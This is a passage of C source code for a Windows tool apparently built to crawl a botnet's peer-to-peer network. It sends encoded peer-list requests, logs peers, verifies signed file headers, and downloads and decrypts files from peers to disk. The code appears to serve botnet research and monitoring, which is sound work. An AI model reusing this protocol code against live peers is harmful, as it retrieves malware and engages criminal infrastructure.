(LONG)TRUE);\n\t\tPostQuitMessage(0);\n\t\tbreak;\n\n\tdefault:\n\t\tbreak;\n\t}\n\treturn DefWindowProc(hwnd, uMsg, wParam, lParam);\n}\n\n/*\n* SfUICreateControls\n*\n* Purpose:\n*\n* Initialize gui controls.\n*\n*/\nvoid SfUICreateControls(\n\tHWND hwndParent\n\t)\n{\n\tLVCOLUMNW   col;\n\tINT         status_parts[5];\n\tRECT        client_rect;\n\n\tGetClientRect(g_guictx.MainWindow, &client_rect);\n\n\tg_guictx.StatusBar = CreateWindowEx(0, STATUSCLASSNAME, NULL,\n\t\tWS_VISIBLE | WS_CHILD | SBARS_SIZEGRIP, 0, \n\t\tclient_rect.bottom - client_rect.top - 20, \n\t\tclient_rect.right - client_rect.left, \n\t\t20, \n\t\tg_guictx.MainWindow, (HMENU)1001, g_guictx.hInstance, NULL);\n\n\tif (g_guictx.StatusBar) {\n\t\tstatus_parts[0] = 200;\n\t\tstatus_parts[1] = 400;\n\t\tstatus_parts[2] = 600;\n\t\tstatus_parts[3] = 700;\n\t\tstatus_parts[4] = -1;\n\t\tSendMessage(g_guictx.StatusBar, SB_SETPARTS, (WPARAM)4, (LPARAM)&status_parts);\n\t}\n\n\tg_guictx.OutputWindow = 
CreateWindowEx(\n\t\t0,\n\t\tWC_LISTVIEW,\n\t\tNULL,        \n\t\tWS_CHILD | WS_VISIBLE | LVS_REPORT | LVS_SINGLESEL,\n\t\t0, 0, 0, 0,   \n\t\thwndParent,\n\t\t(HMENU)0,   \n\t\t(HINSTANCE)g_guictx.hInstance,\n\t\tNULL);\n\n\n\tif (g_guictx.OutputWindow) {\n\n\t\tListView_SetExtendedListViewStyle(g_guictx.OutputWindow,\n\t\t\tLVS_EX_FULLROWSELECT | LVS_EX_DOUBLEBUFFER | LVS_EX_GRIDLINES | LVS_EX_LABELTIP);\n\n\t\tRtlSecureZeroMemory(&col, sizeof(col));\n\t\tcol.mask = LVCF_TEXT | LVCF_SUBITEM | LVCF_FMT | LVCF_WIDTH | LVCF_ORDER;\n\t\tcol.iSubItem = 1;\n\t\tcol.pszText = L\"Event\";\n\t\tcol.fmt = LVCFMT_LEFT;\n\t\tcol.iOrder = 0;\n\t\tcol.iImage = - 1;\n\t\tcol.cx = 120;\n\t\tListView_InsertColumn(g_guictx.OutputWindow, 1, &col);\n\n\t\tcol.iSubItem = 2;\n\t\tcol.pszText = L\"Value\";\n\t\tcol.iOrder = 1;\n\t\tcol.cx = 600;\n\t\tListView_InsertColumn(g_guictx.OutputWindow, 2, &col);\n\t}\n}\n\n/*\n* SfUImain\n*\n* Purpose:\n*\n* Create main window and all components.\n*\n*/\nvoid SfUImain(\n\tVOID\n\t)\n{\n\tMSG\t\t\t\t\t\tmsg1;\n\tWNDCLASSEX\t\t\t\twincls;\n\tBOOL\t\t\t\t\trv = TRUE, cond = FALSE;\n\tATOM\t\t\t\t\tclass_atom = 0;\n\tINITCOMMONCONTROLSEX    icex;\n\n\tRtlSecureZeroMemory(&g_guictx, sizeof(g_guictx));\n\n\ticex.dwSize = sizeof(INITCOMMONCONTROLSEX);\n\ticex.dwICC = ICC_LISTVIEW_CLASSES | ICC_BAR_CLASSES;\n\tInitCommonControlsEx(&icex);\n\n\tg_guictx.hInstance = GetModuleHandle(NULL);\n\n\twincls.cbSize = sizeof(WNDCLASSEX);\n\twincls.style = 0;\n\twincls.lpfnWndProc = &SfUIMainWindowProc;\n\twincls.cbClsExtra = 0;\n\twincls.cbWndExtra = 0;\n\twincls.hInstance = g_guictx.hInstance;\n\twincls.hIcon = NULL;\n\twincls.hCursor = (HCURSOR)LoadImage(NULL, MAKEINTRESOURCE(OCR_NORMAL), IMAGE_CURSOR, 0, 0, LR_SHARED);\n\twincls.hbrBackground = 0;\n\twincls.lpszMenuName = NULL;\n\twincls.lpszClassName = T_SFMAINWNDCLASS;\n\twincls.hIconSm = 0;\n\t\n\tdo {\n\t\tclass_atom = RegisterClassEx(&wincls);\n\t\tif (class_atom == 
0)\n\t\t\tbreak;\n\n\t\tg_guictx.MainWindow = CreateWindowEx(0, MAKEINTATOM(class_atom), T_SFWNDTITLE,\n\t\t\tWS_BORDER | WS_VISIBLE | WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 800, 600, NULL, NULL, g_guictx.hInstance, NULL);\n\n\t\tif (g_guictx.MainWindow == NULL)\n\t\t\tbreak;\n\n\t\tSfUICreateControls(g_guictx.MainWindow);\n\t\tSendMessage(g_guictx.MainWindow, WM_SIZE, 0, 0);\n\n\t\tSfNMain();\n\n\t\tdo {\n\t\t\trv = GetMessage(&msg1, NULL, 0, 0);\n\n\t\t\tif (rv == -1)\n\t\t\t\tbreak;\n\n\t\t\tif (IsDialogMessage(g_guictx.MainWindow, &msg1))\n\t\t\t\tcontinue;\n\n\t\t\tTranslateMessage(&msg1);\n\t\t\tDispatchMessage(&msg1);\n\t\t} while (rv != 0);\n\n\t} while (cond);\n\n\tif (class_atom != 0)\n\t\tUnregisterClass(MAKEINTATOM(class_atom), g_guictx.hInstance);\n}\n"
  },
  {
    "path": "Source/Yuudachi/gui.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       GUI.H\n*\n*  VERSION:     1.00\n*\n*  DATE:        17 Jan 2016\n*\n*  Yuudachi GUI support routines header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\ntypedef struct _ZA_GUI_CONTEXT {\n\tHINSTANCE hInstance;\n\tHWND MainWindow;\n\tHWND OutputWindow;\n\tHWND StatusBar;\n\tBOOL bShutdown;\n} ZA_GUI_CONTEXT, *PZA_GUI_CONTEXT;\n\nextern ZA_GUI_CONTEXT g_guictx;\n\n#define GUI_EVENT_ERROR             0\n#define GUI_EVENT_CONNECTION        1\n#define GUI_EVENT_PACKET_RECV       2\n#define GUI_EVENT_PACKET_SEND       3\n#define GUI_EVENT_DOWNLOAD_FILE     4\n#define GUI_EVENT_FILE_HEADER       5\n#define GUI_EVENT_PEER_HEADER       6\n#define GUI_EVENT_NEWROUND          7\n#define GUI_EVENT_PACKET_HEADER     8\n#define GUI_EVENT_INFORMATION       100\n#define GUI_EVENT_THREAD_STARTED    1000\n#define GUI_EVENT_THREAD_TERMINATED 2000\n\nvoid SfUImain(\n\tVOID\n\t);\n\nVOID SfUIAddEvent(\n\t_In_opt_ PVOID ScanContext,\n\t_In_ ULONG Event,\n\t_In_opt_ LPWSTR lpValue\n\t);\n"
  },
  {
    "path": "Source/Yuudachi/main.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       MAIN.C\n*\n*  VERSION:     1.00\n*\n*  DATE:        17 Jan 2016\n*\n*  Yuudachi program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"..\\shared\\global.h\"\n#include \"gui.h\"\n#include \"p2p.h\"\n\n/*\n* SfMain\n*\n* Purpose:\n*\n* Yuudachi main.\n*\n*/\nvoid SfMain(\n\tVOID\n\t)\n{\n\tWSADATA  wsaData;\n\n\t__security_init_cookie();\n\n\tif (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {\n\t\tExitProcess((UINT)-1);\n\t}\n\t\n\tSfUImain();\n\n\tWSACleanup();\n\tExitProcess(0);\n}\n"
  },
  {
    "path": "Source/Yuudachi/p2p.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       P2P.C\n*\n*  VERSION:     1.01\n*\n*  DATE:        22 Jan 2016\n*\n*  Yuudachi poi2poi.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"p2p.h\"\n#include \"gui.h\"\n#include \"..\\shared\\za_crypto.h\"\n#include \"..\\shared\\ea.h\"\n\ntypedef void (__cdecl *pfnqsort)(\n\t_Inout_updates_bytes_(_NumOfElements * _SizeOfElements) void*  _Base,\n\t_In_                                                    size_t _NumOfElements,\n\t_In_                                                    size_t _SizeOfElements,\n\t_In_ int(__cdecl* _PtFuncCompare)(void const*, void const*)\n\t);\n\nstatic ZA_SCANCTX     g_zascan;\npfnqsort _qsort;\n\n/*\n* SfAvlCompareCallback\n*\n* Purpose:\n*\n* AVL table compare callback.\n*\n*/\nRTL_GENERIC_COMPARE_RESULTS NTAPI SfAvlCompareCallback(\n\t_In_ struct _RTL_AVL_TABLE *Table,\n\t_In_ PVOID FirstStruct,\n\t_In_ PVOID SecondStruct\n\t)\n{\n\tRTL_GENERIC_COMPARE_RESULTS res;\n\tZA_PEERINFO *Peer1 = (ZA_PEERINFO*)FirstStruct;\n\tZA_PEERINFO *Peer2 = (ZA_PEERINFO*)SecondStruct;\n\n\tUNREFERENCED_PARAMETER(Table);\n\n\t//order by IP first, then by port, so peers sharing an IP compare consistently in both directions\n\tif (Peer1->IP != Peer2->IP)\n\t\tres = (Peer1->IP > Peer2->IP) ? GenericGreaterThan : GenericLessThan;\n\telse if (Peer1->Port != Peer2->Port)\n\t\tres = (Peer1->Port > Peer2->Port) ? GenericGreaterThan : GenericLessThan;\n\telse\n\t\tres = GenericEqual;\n\n\treturn res;\n}\n\n/*\n* SfAvlAllocateCallback\n*\n* Purpose:\n*\n* AVL table allocate memory callback.\n*\n*/\nPVOID NTAPI SfAvlAllocateCallback(\n\t_In_ struct _RTL_AVL_TABLE *Table,\n\t_In_ ULONG ByteSize\n\t)\n{\n\tUNREFERENCED_PARAMETER(Table);\n\treturn RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 
HEAP_ZERO_MEMORY, ByteSize);\n}\n\n/*\n* SfAvlFreeCallback\n*\n* Purpose:\n*\n* AVL table free memory callback.\n*\n*/\nVOID NTAPI SfAvlFreeCallback(\n\t_In_  _RTL_AVL_TABLE *Table,\n\t_In_ _Post_invalid_ PVOID Buffer\n\t)\n{\n\tUNREFERENCED_PARAMETER(Table);\n\tRtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Buffer);\n}\n\n/*\n* SfQSortCompare\n*\n* Purpose:\n*\n* qsort callback.\n*\n*/\nint __cdecl SfQSortCompare(\n\tvoid const* first,\n\tvoid const* second\n\t)\n{\n\tint i;\n\tZA_PEERINFO *Peer1 = (ZA_PEERINFO*)first;\n\tZA_PEERINFO *Peer2 = (ZA_PEERINFO*)second;\n\n\tif (Peer1->TimeStamp <= Peer2->TimeStamp)\n\t\ti = (Peer1->TimeStamp < Peer2->TimeStamp);\n\telse\n\t\ti = -1;\n\treturn i;\n}\n\n/*\n* SfNStoreFile\n*\n* Purpose:\n*\n* Save file in U directory and add EA for Harusame.\n*\n*/\nBOOL SfNStoreFile(\n\t_In_ ZA_SCANCTX *ScanContext,\n\t_In_ LPWSTR FileName,\n\t_In_ PVOID FileBuffer,\n\t_In_ ULONG FileSize,\n\t_In_ ZA_FILEHEADER *FileHeader\n\t)\n{\n\tBOOL              bResult = FALSE;\n\tHANDLE            hFile;\n\tNTSTATUS          status;\n\tOBJECT_ATTRIBUTES ObjectAttributes;\n\tIO_STATUS_BLOCK   IoStatusBlock;\n\tUNICODE_STRING    usName;\n\n\tRtlSecureZeroMemory(&usName, sizeof(usName));\n\tRtlInitUnicodeString(&usName, FileName);\n\tInitializeObjectAttributes(&ObjectAttributes, &usName, OBJ_CASE_INSENSITIVE, \n\t\tScanContext->RootDirectoryHandle, NULL);\n\n\tstatus = NtCreateFile(&hFile, FILE_GENERIC_WRITE, &ObjectAttributes,\n\t\t&IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,\n\t\tFILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n\n\tif (NT_SUCCESS(status)) {\n\t\tif (NT_SUCCESS(NtWriteFile(hFile, NULL, NULL, NULL,\n\t\t\t&IoStatusBlock, FileBuffer, FileSize, NULL, NULL)))\n\t\t{\n\t\t\tbResult = SfNtfsSetFileHeaderToEa(hFile, FileHeader);\n\t\t}\n\t\tNtClose(hFile);\n\t}\n\treturn bResult;\n}\n\n/*\n* SfNDownloadFile\n*\n* Purpose:\n*\n* Download file from p2p network.\n*\n*/\nBOOL SfNDownloadFile(\n\t_In_ 
ZA_SCANCTX *ScanContext,\n\t_In_ ZA_FILEHEADER *FileHeader,\n\t_In_ ZA_PEERINFO *in_peer\n\t)\n{\n\tBOOL                cond = FALSE, bResult = FALSE;\n\tSOCKET              st = INVALID_SOCKET;\n\tstruct sockaddr_in  io_addr;\n\tMD5_CTX             ctx;\n\trc4_state           rc4ctx;\n\tPBYTE               recvbuffer = NULL;\n\tint                 recv_size;\n\tSIZE_T              sz;\n\tWCHAR               szText[MAX_PATH];\n\n\n\tdo {\n\t\tst = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n\t\tif (st == INVALID_SOCKET)\n\t\t\tbreak;\n\n\t\tRtlSecureZeroMemory(&io_addr, sizeof(io_addr));\n\t\tio_addr.sin_family = AF_INET;\n\t\tio_addr.sin_port = htons(TCP_PORT);\n\t\tif (bind(st, (struct sockaddr *)&io_addr, sizeof(io_addr)) != 0)\n\t\t\tbreak;\n\n\t\tRtlSecureZeroMemory(&io_addr, sizeof(io_addr));\n\t\tio_addr.sin_family = AF_INET;\n\t\tio_addr.sin_port = htons((u_short)(P2P_UDP_PORT_ADJUST + in_peer->Port));\n\t\tio_addr.sin_addr.S_un.S_addr = in_peer->IP;\n\n\t\t_strcpy(szText, TEXT(\">>> trying connect to -> \"));\n\t\tRtlIpv4AddressToStringW((const struct in_addr*)&io_addr.sin_addr, _strend(szText));\n\t\t_strcat(szText, TEXT(\":\"));\n\t\tultostr(ntohs(io_addr.sin_port), _strend(szText));\n\t\tSfUIAddEvent(ScanContext, GUI_EVENT_DOWNLOAD_FILE, szText);\n\n\t\tif (connect(st, (struct sockaddr *)&io_addr, sizeof(io_addr)) != 0) {\n\t\t\t_strcpy(szText, TEXT(\">>> \"));\n\t\t\tRtlIpv4AddressToStringW((const struct in_addr*)&io_addr.sin_addr, _strend(szText));\n\t\t\t_strcat(szText, TEXT(\":\"));\n\t\t\tultostr(ntohs(io_addr.sin_port), _strend(szText));\n\t\t\t_strcat(szText, TEXT(\" <- connection attempt timed out\"));\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_DOWNLOAD_FILE, szText);\n\t\t\tbreak;\n\t\t}\n\n\t\tSfUIAddEvent(ScanContext, GUI_EVENT_DOWNLOAD_FILE, TEXT(\">>> <- connected OK\"));\n\n\t\tsz = RECV_BUFFER_SIZE * 4;\n\t\trecvbuffer = NULL;\n\t\tNtAllocateVirtualMemory(NtCurrentProcess(), &recvbuffer, 0, &sz, MEM_RESERVE | MEM_COMMIT, 
PAGE_READWRITE);\n\t\tif (recvbuffer == NULL)\n\t\t\tbreak;\n\n\t\tsend(st, (const char *)FileHeader, 12, 0);\n\t\trecv_size = recv(st, (char *)recvbuffer, RECV_BUFFER_SIZE, 0);\n\n\t\tif (recv_size <= 0)\n\t\t\tbreak;\n\n\t\tif ((ULONG)recv_size < FileHeader->Size) {\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_DOWNLOAD_FILE, TEXT(\">>> received size is not equal to the header\"));\n\t\t\tbreak;\n\t\t}\n\n\t\tMD5Init(&ctx);\n\t\tMD5Update(&ctx, (const unsigned char *)FileHeader, 12);\n\t\tMD5Final(&ctx);\n\t\trc4_init(&rc4ctx, (const unsigned char *)&ctx.digest, sizeof(ctx.digest));\n\t\trc4_crypt(&rc4ctx, recvbuffer, recvbuffer, recv_size);\n\n\t\t_strcpy(szText, TEXT(\"U\\\\ip-\"));\n\t\tRtlIpv4AddressToStringW((const struct in_addr*)&io_addr.sin_addr, _strend(szText));\n\t\t_strcat(szText, TEXT(\"-port-\"));\n\t\tultostr(ntohs(io_addr.sin_port), _strend(szText));\n\t\t_strcat(szText, TEXT(\"-id-\"));\n\t\tultohex(FileHeader->Name, _strend(szText));\n#ifdef _WIN64\n\t\t_strcat(szText, TEXT(\"-64\"));\n#else\n\t\t_strcat(szText, TEXT(\"-32\"));\n#endif\n\t\t_strcat(szText, TEXT(\".bin\"));\n\n\t\tbResult = SfNStoreFile(ScanContext, szText, recvbuffer, recv_size, FileHeader);\n\n\t\tif (bResult) {\n\t\t\t_strcat(szText, TEXT(\" file saved OK\"));\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_DOWNLOAD_FILE, szText);\n\t\t}\n\t\telse {\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_ERROR, TEXT(\">>> error saving file\"));\n\t\t}\n\n\t} while (cond);\n\n\tif (recvbuffer != NULL) {\n\t\tsz = 0;\n\t\tNtFreeVirtualMemory(NtCurrentProcess(), &recvbuffer, &sz, MEM_RELEASE);\n\t}\n\n\tif (st != INVALID_SOCKET) {\n\t\tshutdown(st, SD_BOTH);\n\t\tclosesocket(st);\n\t}\n\n\treturn bResult;\n}\n\n/*\n* SfNAddFileHeader\n*\n* Purpose:\n*\n* Process file header, validate and download.\n*\n*/\nVOID SfNAddFileHeader(\n\t_In_ ZA_SCANCTX *ScanContext,\n\t_In_ ZA_FILEHEADER *hdr,\n\t_In_ ZA_PEERINFO *in_peer\n\t)\n{\n\tULONG\t       c;\n\tWCHAR          text[MAX_PATH];   \n\tLARGE_INTEGER  
ftime;\n\tSYSTEMTIME     st1;\n\n\tif (ScanContext->NumberOfFiles >= MAXIMUM_FILES)\n\t\treturn;\n\n\tfor (c = 0; c < ScanContext->NumberOfFiles; c++) {\n\t\tif (memcmp(&ScanContext->FileHeaders[c], hdr, sizeof(ZA_FILEHEADER)) == 0) {\n#ifdef _DEBUG\t\t\n\t\t\tOutputDebugString(TEXT(\"Received file header already in the list\\r\\n\"));\n#endif\t\t\t\n\t\t\treturn;\n\t\t}\n\t}\n\n\t_strcpy(text, TEXT(\">> new file header received ->Name: \"));\n\tultohex(hdr->Name, _strend(text));\n\t_strcat(text, TEXT(\", TimeStamp: \"));\n\n\tRtlSecondsSince1980ToTime(hdr->Time, &ftime);\n\tif (FileTimeToSystemTime((PFILETIME)&ftime, &st1)) {\n\t\tultostr(st1.wDay, _strend(text));\n\t\t_strcat(text, TEXT(\"/\"));\n\t\tultostr(st1.wMonth, _strend(text));\n\t\t_strcat(text, TEXT(\"/\"));\n\t\tultostr(st1.wYear, _strend(text));\n\t\t_strcat(text, TEXT(\" \"));\n\t\tultostr(st1.wHour, _strend(text));\n\t\t_strcat(text, TEXT(\":\"));\n\t\tultostr(st1.wMinute, _strend(text));\n\t\t_strcat(text, TEXT(\":\"));\n\t\tultostr(st1.wSecond, _strend(text));\n\t}\n\telse {\n\t\tultohex(hdr->Time, _strend(text));\n\t}\n\t_strcat(text, TEXT(\", Size: \"));\n\tultostr(hdr->Size, _strend(text));\n\tSfUIAddEvent(ScanContext, GUI_EVENT_FILE_HEADER, text);\n\n\t_strcpy(text, TEXT(\">> checking file header signature \"));\n\tif (SfcValidateFileHeader(ScanContext->CryptoProv, ScanContext->CryptoKey, hdr)) {\n\t\t_strcat(text, TEXT(\" -> verified OK, processing download\"));\n\t\tif (SfNDownloadFile(ScanContext, hdr, in_peer)) {\n\t\t\tRtlCopyMemory(&ScanContext->FileHeaders[ScanContext->NumberOfFiles], hdr, sizeof(ZA_FILEHEADER));\n\t\t\tScanContext->NumberOfFiles++;\n\t\t}\n\t}\n\telse {\n\t\t_strcat(text, TEXT(\" -> verification FAILED, file header tampered\"));\n\t}\n\tSfUIAddEvent(ScanContext, GUI_EVENT_FILE_HEADER, text);\n}\n\n/*\n* SfNFormatPrintPeer\n*\n* Purpose:\n*\n* Output peer info to listview.\n*\n*/\nvoid SfNFormatPrintPeer(\n\tZA_SCANCTX *ScanContext, \n\tZA_PEERINFO 
*peer\n\t)\n{\n\tTCHAR\t\t\ttext[128];\n\tLARGE_INTEGER\tftime;\n\tSYSTEMTIME\t\tst1;\n\n\tRtlSecureZeroMemory(text, sizeof(text));\n\t_strcpy(text, TEXT(\">> peer record received ->\"));\n\tRtlIpv4AddressToStringW((const struct in_addr *)&peer->IP, _strend(text));\n\t_strcat(text, TEXT(\":\"));\n\t\n\tultostr(P2P_UDP_PORT_ADJUST + peer->Port, _strend(text));\n\t_strcat(text, TEXT(\" \"));\n\n\tRtlSecondsSince1980ToTime((peer->TimeStamp * 3600) - 0xbf000000, &ftime);\n\tRtlSecureZeroMemory(&st1, sizeof(st1));\n\tif (FileTimeToSystemTime((PFILETIME)&ftime, &st1)) {\n\t\tultostr(st1.wDay, _strend(text));\n\t\t_strcat(text, TEXT(\"/\"));\n\t\tultostr(st1.wMonth, _strend(text));\n\t\t_strcat(text, TEXT(\"/\"));\n\t\tultostr(st1.wYear, _strend(text));\n\t\t_strcat(text, TEXT(\" \"));\n\t\tultostr(st1.wHour, _strend(text));\n\t\t_strcat(text, TEXT(\":\"));\n\t\tultostr(st1.wMinute, _strend(text));\n\t\t_strcat(text, TEXT(\":\"));\n\t\tultostr(st1.wSecond, _strend(text));\n\t}\n\tSfUIAddEvent(ScanContext, GUI_EVENT_PEER_HEADER, text);\n}\n\n/*\n* SfNAddToTable\n*\n* Purpose:\n*\n* Insert new peer element to AVL tables.\n*\n*/\nVOID SfNAddToTable(\n\tZA_SCANCTX *ScanContext,\n\tZA_PEERINFO *peer\n\t)\n{\n\tIO_STATUS_BLOCK  IoStatusBlock;\n\tLARGE_INTEGER    Position;\n\tZA_PEERINFO     *LookupElement;\n\tBOOLEAN          NewElement = FALSE;\n\n\tRtlEnterCriticalSection(&ScanContext->csTableLock);\n\n\t//add new element to table, check before if it already in\n\tLookupElement = RtlLookupElementGenericTableAvl(&ScanContext->PeersTable, (PVOID)peer);\n\tif (LookupElement == NULL) {\n\t\tRtlInsertElementGenericTableAvl(&ScanContext->PeersTable, peer, sizeof(ZA_PEERINFO), &NewElement);\n\t}\n\n#ifdef _DEBUG\n\telse {\n\t\tOutputDebugString(TEXT(\"Duplicate peer entry found\\r\\n\"));\n\t}\n#endif\n\tRtlLeaveCriticalSection(&ScanContext->csTableLock);\n\n\t//this is new element, collect it and send to listview\n\tRtlEnterCriticalSection(&ScanContext->csTableDumpLock);\n\tif 
(LookupElement == NULL) {\n\n\t\tLookupElement = RtlLookupElementGenericTableAvl(&ScanContext->PeersTableDump, (PVOID)peer);\n\t\tif (LookupElement == NULL) {\n\t\t\tRtlInsertElementGenericTableAvl(&ScanContext->PeersTableDump, peer, sizeof(ZA_PEERINFO), &NewElement);\n\n\t\t\tPosition.LowPart = FILE_WRITE_TO_END_OF_FILE;\n\t\t\tPosition.HighPart = -1;\n\t\t\tif (NT_SUCCESS(NtWriteFile(ScanContext->DumpFileHandle, 0, NULL, NULL,\n\t\t\t\t&IoStatusBlock, peer, sizeof(ZA_PEERINFO), &Position, NULL)))\n\t\t\t{\n\t\t\t\tNtFlushBuffersFile(ScanContext->DumpFileHandle, &IoStatusBlock);\n\t\t\t}\n\t\t\tSfNFormatPrintPeer(ScanContext, peer);\n\t\t}\n#ifdef _DEBUG\n\t\telse {\n\t\t\tOutputDebugString(TEXT(\"Duplicate peer entry in dump found\\r\\n\"));\n\t\t}\n#endif\n\t}\n\tRtlLeaveCriticalSection(&ScanContext->csTableDumpLock);\n}\n\n/*\n* SfNgetLSender\n*\n* Purpose:\n*\n* getL processing thread.\n*\n*/\nDWORD WINAPI SfNgetLSender(\n\t_In_ PZA_SCANCTX ScanContext\n\t)\n{\n\tTCHAR\t\t\t\ttextbuf[256];\n\tstruct sockaddr_in\tio_addr;\n\tULONG\t\t\t\tc = 0, n = 0;\n\tZA_PACKETHEADER\t\tpacket;\n\tUSHORT              port;\n\tZA_PEERINFO        *TableEntry;\n\tZA_PEERINFO        *CurrentState;\n\tSIZE_T              memIO;\n\n\tRtlSecureZeroMemory(&textbuf, sizeof(textbuf));\n\t_strcpy(textbuf, TEXT(\"> getL thread started, sid=0x\"));\n\tultohex(ScanContext->SessionId, _strend(textbuf));\n\tSfUIAddEvent(ScanContext, GUI_EVENT_THREAD_STARTED, textbuf);\n\n\tRtlEnterCriticalSection(&ScanContext->csTableLock);\n\n\tn = RtlNumberGenericTableElementsAvl(&ScanContext->PeersTable);\n\n\tmemIO = n * sizeof(ZA_PEERINFO);\n\tCurrentState = NULL;\n\tNtAllocateVirtualMemory(NtCurrentProcess(), &CurrentState, 0, &memIO, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\n\tif (CurrentState) {\n\n\t\tRtlSecureZeroMemory(CurrentState, memIO);\n\n\t\tfor (\n\t\t\tTableEntry = RtlEnumerateGenericTableAvl(&ScanContext->PeersTable, TRUE), c = 0;\n\t\t\tTableEntry != NULL;\n\t\t\tTableEntry = 
RtlEnumerateGenericTableAvl(&ScanContext->PeersTable, FALSE), c += 1)\n\t\t{\n\t\t\tRtlCopyMemory(&CurrentState[c], TableEntry, sizeof(ZA_PEERINFO));\n\t\t}\n\n\t}\n\tRtlLeaveCriticalSection(&ScanContext->csTableLock);\n\n\t//memory error\n\tif (CurrentState == NULL)\n\t\treturn (DWORD)-1;\n\n\tc = 0;\n\t_qsort(CurrentState, n, sizeof(ZA_PEERINFO), &SfQSortCompare);\n\n\twhile (!g_guictx.bShutdown) {\n\n\t\tRtlSecureZeroMemory(&io_addr, sizeof(io_addr));\n\t\tio_addr.sin_family = AF_INET;\n\n\t\tport = (USHORT)(P2P_UDP_PORT_ADJUST + CurrentState[c].Port);\n\t\t\n\t\tio_addr.sin_port = htons((u_short)port);\n\t\tio_addr.sin_addr.S_un.S_addr = CurrentState[c].IP;\n\n\t\tpacket.CRC = 0;\n\t\tpacket.Command = 'getL';\n\t\tpacket.SessionID = ScanContext->SessionId;\n\t\tpacket.Opt1 = 0x0000;\n\t\tpacket.Opt2 = c & 0x3ff;\n\t\tpacket.CRC = RtlComputeCrc32(0, (PUCHAR)&packet, sizeof(packet));\n\t\tSfuDecodeStream((PBYTE)&packet, sizeof(packet), '1234');\n\n\t\t_strcpy(textbuf, TEXT(\"> sending getL -> \"));\n\t\tRtlIpv4AddressToStringW((const struct in_addr*)&io_addr.sin_addr, _strend(textbuf));\n\t\t_strcat(textbuf, TEXT(\":\"));\n\t\tultostr(ntohs(io_addr.sin_port), _strend(textbuf));\n\t\tSfUIAddEvent(ScanContext, GUI_EVENT_PACKET_SEND, textbuf);\n\n\t\tsendto(ScanContext->su, (const char *)&packet, sizeof(packet), 0, (struct sockaddr *)&io_addr, sizeof(io_addr));\n\n\t\tc += 1;\n\t\tif (c >= n) {\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_NEWROUND, TEXT(\"New round!\"));\n\t\t\t\n\t\t\tmemIO = 0;\n\t\t\tNtFreeVirtualMemory(NtCurrentProcess(), &CurrentState, &memIO, MEM_RELEASE);\n\t\t\tCurrentState = NULL;\n\n\t\t\tRtlEnterCriticalSection(&ScanContext->csTableLock);\n\n\t\t\tn = RtlNumberGenericTableElementsAvl(&ScanContext->PeersTable);\n\t\t\tmemIO = n * sizeof(ZA_PEERINFO);\n\t\t\tNtAllocateVirtualMemory(NtCurrentProcess(), &CurrentState, 0, &memIO, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\n\t\t\tif (CurrentState) {\n\t\t\t\tRtlSecureZeroMemory(CurrentState, 
memIO);\n\t\t\t\tfor (\n\t\t\t\t\tTableEntry = RtlEnumerateGenericTableAvl(&ScanContext->PeersTable, TRUE), c = 0;\n\t\t\t\t\tTableEntry != NULL;\n\t\t\t\t\tTableEntry = RtlEnumerateGenericTableAvl(&ScanContext->PeersTable, FALSE), c += 1)\n\t\t\t\t{\n\t\t\t\t\tRtlCopyMemory(&CurrentState[c], TableEntry, sizeof(ZA_PEERINFO));\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tRtlLeaveCriticalSection(&ScanContext->csTableLock);\n\n\t\t\t//memory error\n\t\t\tif (CurrentState == NULL)\n\t\t\t\tbreak;\n\n\t\t\tc = 0;\n\t\t\t_qsort(CurrentState, n, sizeof(ZA_PEERINFO), &SfQSortCompare);\n\n\t\t\tSleep(1000);\n\t\t\tcontinue;\n\t\t}\n\t\tSleep(1000);\n\t}\n\n\tSfUIAddEvent(ScanContext, GUI_EVENT_THREAD_TERMINATED, TEXT(\"getL thread terminated.\"));\n\treturn 0;\n}\n\n/*\n* SfNP2PListener\n*\n* Purpose:\n*\n* Listener thread.\n*\n*/\nDWORD WINAPI SfNP2PListener(\n\t_In_ PZA_SCANCTX ScanContext\n\t)\n{\n\tWCHAR               textbuf[MAX_PATH];\n\tstruct sockaddr_in  io_addr;\n\tint                 addr_len, recv_bytes;\n\tchar                *recvbuffer = NULL, *sendbuffer = NULL;\n\tPZA_PACKET          recvpacket, sendpacket;\n\tULONG               crc, k, l;\n\tUSHORT              Port;\n\tBOOL                cond = 